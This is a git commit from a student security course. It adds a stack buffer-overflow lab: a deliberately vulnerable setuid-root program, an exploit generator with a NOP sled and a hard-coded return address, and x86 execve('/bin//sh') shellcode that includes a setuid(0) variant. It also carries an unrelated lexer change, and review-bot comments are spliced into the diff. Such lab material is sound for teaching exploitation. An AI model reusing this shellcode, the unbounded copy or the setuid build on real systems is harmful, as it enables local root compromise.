
commit 37a769ca5b7668e3b593fddf42cdeeaca1512049
parent 079549ee79b6f72028fe6ff8fb11c5f0df1ad9d3
Author: Christos Margiolis <christos@margiolis.net>
Date:   Sat, 30 Apr 2022 17:41:37 +0300

ex2

Diffstat:
Ac_security/ex2/Makefile | 22++++++++++++++++++++++
Ac_security/ex2/dash_shellcode.c | 31+++++++++++++++++++++++++++++++
Ac_security/ex2/exploit.c | 42++++++++++++++++++++++++++++++++++++++++++
Ac_security/ex2/shellcode.c | 24++++++++++++++++++++++++
Ac_security/ex2/stack.c | 30++++++++++++++++++++++++++++++
Mlex_bison_compilers/part2/lex.l | 14+++++++-------
Alex_bison_compilers/part2/output.txt | 39+++++++++++++++++++++++++++++++++++++++
7 files changed, 195 insertions(+), 7 deletions(-)

diff --git a/c_security/ex2/Makefile b/c_security/ex2/Makefile
@@ -0,0 +1,22 @@
+TARGS = shellcode \
+ dash_shellcode \
+ stack \
+ exploit
+
+#SCRIPTS =
+
+CC = cc
+CFLAGS = -std=c99 -pedantic -Wall -Os -Iinclude -g -z execstack \
+ -fno-stack-protector
+LIBS = -Llib
+
+all:
+ for targ in ${TARGS} ; do \
+ ${CC} $${targ}.c ${LIBS} -o $${targ} ; \
+ chown root $${targ} ; \
+ chmod 4755 $${targ} ; \
+ done
+ #chmod +x ${SCRIPTS}
+
+clean:
+ rm -f ${TARGS} bad *.o *.core
diff --git a/c_security/ex2/dash_shellcode.c b/c_security/ex2/dash_shellcode.c
@@ -0,0 +1,31 @@
+#include <string.h>
+
+static const char code[] =
+ /* setuid(0) */
+ "\x31\xc0" /* xorl %eax, %eax */
+ "\x31\xdb" /* xorl %ebx, %ebx */
+ "\xb0\xd5" /* movb $0xd5, %al */
+ "\xcd\x80" /* int $0x80 */
+
+ /* same code as in shellcode.c */
+ "\x31\xc0" /* xorl %eax, %eax */
+ "\x50" /* pushl %eax */
+ "\x68""//sh" /* pushl addr */
+ "\x68""/bin" /* pushl addr */
+ "\x89\xe3" /* movl %esp, %ebx */
+ "\x50" /* pushl %eax */
+ "\x53" /* pushl %ebx */
+ "\x89\xe1" /* movl %esp, %ecx */
+ "\x99" /* cdq */
+ "\xb0\x0b" /* movb $0x0b, %al */
+ "\xcd\x80" /* int $0x80 */
+ ;
+
+int
+main(int argc, char *argv[])
+{
+ void (*sc)() = (void *)code;
+ sc();
+
+ return (0);
+}
diff --git a/c_security/ex2/exploit.c b/c_security/ex2/exploit.c
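Review bot: The `all` recipe runs `chown root` and `chmod 4755` on every name in TARGS, so `exploit` becomes setuid-root as well, although in this commit it only writes the file `bad` and does not appear to need elevated privileges. Every one of these binaries stays on disk as a setuid-root executable until `make clean` is run, which is a standing local privilege-escalation risk if the checkout lives on a shared or long-lived machine. I would limit the setuid step to the targets the exercise actually needs and put a comment above `all:`, for example `# lab only: creates setuid-root binaries; build in a disposable VM and run 'make clean' when done`.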
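Review bot: `main` in dash_shellcode.c declares `argc` and `argv` without using them and the file includes `<string.h>` although nothing from it is called; `int main(void)` and dropping the include would be cleaner. The line `void (*sc)() = (void *)code;` converts an object pointer to a function pointer, which ISO C does not define, so it deserves a comment saying it is deliberate, e.g. `/* deliberate: lab demo that treats a byte array as code; not portable C */`. A short file header naming the platform the byte sequence assumes would also help; the instruction comments suggest 32-bit x86 Linux, but the file never says so. The same points apply to `main` in shellcode.c.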
@@ -0,0 +1,42 @@
+#include <err.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+static const char code[] =
+ "\x31\xc0" /* xorl %eax, %eax */
+ "\x50" /* pushl %eax */
+ "\x68""//sh" /* pushl addr */
+ "\x68""/bin" /* pushl addr */
+ "\x89\xe3" /* movl %esp, %ebx */
+ "\x50" /* pushl %eax */
+ "\x53" /* pushl %ebx */
+ "\x89\xe1" /* movl %esp, %ecx */
+ "\x99" /* cdq */
+ "\xb0\x0b" /* movb $0x0b, %al */
+ "\xcd\x80" /* int $0x80 */
+ ;
+
+int
+main(int argc, char *argv[])
+{
+ FILE *badfp;
+ char buf[517];
+
+ /* fill with NOPs */
+ memset(&buf, 0x90, sizeof(buf));
+
+ /* place return address */
+ *((long *)(buf + 0x24)) = 0x7fffffffe670 + 0x60;
+
+ /* write shellcode at the end of buf */
+ memcpy(buf + sizeof(buf) - sizeof(code), code, sizeof(code));
+
+ /* save to badfp */
+ if ((badfp = fopen("bad", "w")) == NULL)
+ err(1, "fopen(bad)");
+ fwrite(buf, sizeof(buf), 1, badfp);
+ fclose(badfp);
+
+ return (0);
+}
diff --git a/c_security/ex2/shellcode.c b/c_security/ex2/shellcode.c
@@ -0,0 +1,24 @@
+#include <string.h>
+
+static const char code[] =
+ "\x31\xc0" /* xorl %eax, %eax */
+ "\x50" /* pushl %eax */
+ "\x68""//sh" /* pushl $0x68732f2f */
+ "\x68""/bin" /* pushl $0x6e69622f */
+ "\x89\xe3" /* movl %esp, %ebx */
+ "\x50" /* pushl %eax */
+ "\x53" /* pushl %ebx */
+ "\x89\xe1" /* movl %esp, %ecx */
+ "\x99" /* cdq */
+ "\xb0\x0b" /* movb $0x0b, %al */
+ "\xcd\x80" /* int $0x80 */
+ ;
+
+int
+main(int argc, char *argv[])
+{
+ void (*sc)() = (void *)code;
+ sc();
+
+ return (0);
+}
diff --git a/c_security/ex2/stack.c b/c_security/ex2/stack.c
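Review bot: The results of `fwrite(buf, sizeof(buf), 1, badfp)` and `fclose(badfp)` at the end of `main` in exploit.c are ignored, so a short or failed write leaves a truncated `bad` file while the program still exits 0. Both should be checked, e.g. `if (fwrite(buf, sizeof(buf), 1, badfp) != 1) err(1, "fwrite(bad)");` and `if (fclose(badfp) != 0) err(1, "fclose(bad)");`. Because the Makefile in this commit makes this binary setuid-root, `fopen("bad", "w")` on a relative path also creates or truncates that path with root privileges in whatever directory the caller runs it from; dropping the setuid bit from this target removes that exposure.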
@@ -0,0 +1,30 @@
+#include <err.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+int
+bof(char *str)
+{
+ char buf[24];
+
+ printf("addr: %p\n", buf);
+ strcpy(buf, str);
+ return (1);
+}
+
+int
+main(int argc, char *argv[])
+{
+ FILE *badfp;
+ char str[517];
+
+ if ((badfp = fopen("bad", "r")) == NULL)
+ err(1, "fopen(bad)");
+ fread(str, sizeof(char), 517, badfp);
+ fclose(badfp);
+ bof(str);
+ printf("returned\n");
+
+ return (0);
+}
diff --git a/lex_bison_compilers/part2/lex.l b/lex_bison_compilers/part2/lex.l
@@ -12,27 +12,27 @@ int lineno = 1; %} DELIM [ \t]+ +KEYWORD deffacts|defrule|test|bind|read|printout +OPERATOR =|\+|-|\*|\/ INT 0|[+-]?[1-9]+[0-9]* FLOAT [+-]?[0-9]+((\.[0-9]+)([eE][+-]?[0-9]*)?|([eE][+-]?[0-9]*)?) STR \"[^\"\\]*(?:\\.[^\"\\]*)*\" DEFIN [A-Za-z]+[A-Za-z0-9_-]* VAR \?[A-Za-z0-9]+ COMMENT ;.* -KEYWORD deffacts|defrule|test|bind|read|printout -OPERATOR =|\+|-|\*|\/ UNKNOWN [^ {DELIM}\n]+ -%% +%% {DELIM} { /* ignore whitespace */ } +{KEYWORD} { return TOK_KEYWORD; } +{OPERATOR} { return TOK_OPERATOR; } {INT} { return TOK_INT; } {FLOAT} { return TOK_FLOAT; } {STR} { return TOK_STR; } {DEFIN} { return TOK_DEFIN; } {VAR} { return TOK_VAR; } -{COMMENT} { /* skip comments */ } -{KEYWORD} { return TOK_KEYWORD; } -{OPERATOR} { return TOK_OPERATOR; } {UNKNOWN} { return TOK_UNKNOWN; } +{COMMENT} { /* skip comments */ } \n { lineno++; } <<EOF>> { printf("EOF\n"); exit(0); } %%
@@ -63,7 +63,7 @@ main(int argc, char *argv[]) err(1, "fopen(%s)", argv[2]); while ((tok = yylex()) >= 0) { - fprintf(yyout, "line: %d\ttoken=%s\tval='%s'\n", + fprintf(yyout, "line: %5d\ttoken=%s\tval='%s'\n", lineno, tokens[tok-1], yytext); }
diff --git a/lex_bison_compilers/part2/output.txt b/lex_bison_compilers/part2/output.txt
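Review bot: `main` in stack.c hands `str` to `bof()` without ever NUL-terminating it: `fread` fills up to 517 bytes of an uninitialised 517-byte array and its return value is ignored, so for any `bad` file that is short or contains no NUL byte the `strcpy` in `bof()` reads past the end of `str`, on top of the unbounded write into `buf[24]`. If the overflow of `buf` is the intended subject of the exercise, mark it with a comment such as `/* intentionally unbounded copy: lab target, do not reuse */` and still terminate the input, `size_t n = fread(str, 1, sizeof(str) - 1, badfp);` followed by `str[n] = '\0';`. Outside a lab the copy itself would be bounded, for instance `snprintf(buf, sizeof(buf), "%s", str);`. Printing the address of `buf` also discloses stack layout and should carry the same lab-only comment.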
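Review bot: Moving `{COMMENT}` below `{UNKNOWN}` in the rules section changes which rule wins on equal-length matches, because flex resolves ties in favour of the rule listed first. A comment containing no blank, such as `;todo` (constructed example), is matched in full by both `;.*` and `[^ {DELIM}\n]+`, so after this change it would be returned as TOK_UNKNOWN instead of being skipped; keeping `{COMMENT}` above `{UNKNOWN}` avoids that. Separately, on an unchanged context line, flex does not expand `{DELIM}` inside a bracket expression, so the UNKNOWN class as shown excludes the literal characters `{`, `D`, `E`, `L`, `I`, `M` and `}` rather than tabs; `[^ \t\n]+` would state the apparent intent.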
@@ -0,0 +1,39 @@
+line: 1 token=INT val='+1234'
+line: 2 token=INT val='50'
+line: 3 token=INT val='-115'
+line: 4 token=FLOAT val='3.14'
+line: 5 token=FLOAT val='-10.0'
+line: 6 token=FLOAT val='+0.0001'
+line: 7 token=FLOAT val='3.14e-10'
+line: 8 token=FLOAT val='0e0'
+line: 9 token=DEFIN val='static-facts'
+line: 10 token=DEFIN val='MoveUp'
+line: 11 token=DEFIN val='CUBES'
+line: 12 token=DEFIN val='sum-1'
+line: 13 token=DEFIN val='table'
+line: 14 token=DEFIN val='pacman'
+line: 15 token=DEFIN val='A-21-b'
+line: 16 token=VAR val='?x'
+line: 17 token=VAR val='?X'
+line: 18 token=VAR val='?3'
+line: 19 token=VAR val='?ad'
+line: 20 token=VAR val='?X1b23'
+line: 21 token=VAR val='?32AbC'
+line: 22 token=VAR val='?ABcd1234de'
+line: 23 token=STR val='""'
+line: 24 token=STR val='"Test"'
+line: 25 token=STR val='"Hello world"'
+line: 26 token=STR val='"Mark said, \"Boo!\""'
+line: 28 token=DEFIN val='ignore'
+line: 28 token=DEFIN val='whitespace'
+line: 29 token=UNKNOWN val='#unknown'
+line: 29 token=VAR val='?2'
+line: 29 token=UNKNOWN val='?'
+line: 29 token=VAR val='?hello'
+line: 29 token=VAR val='?world'
+line: 30 token=KEYWORD val='deffacts'
+line: 30 token=KEYWORD val='defrule'
+line: 30 token=KEYWORD val='test'
+line: 31 token=INT val='2'
+line: 31 token=OPERATOR val='+'
+line: 31 token=INT val='2'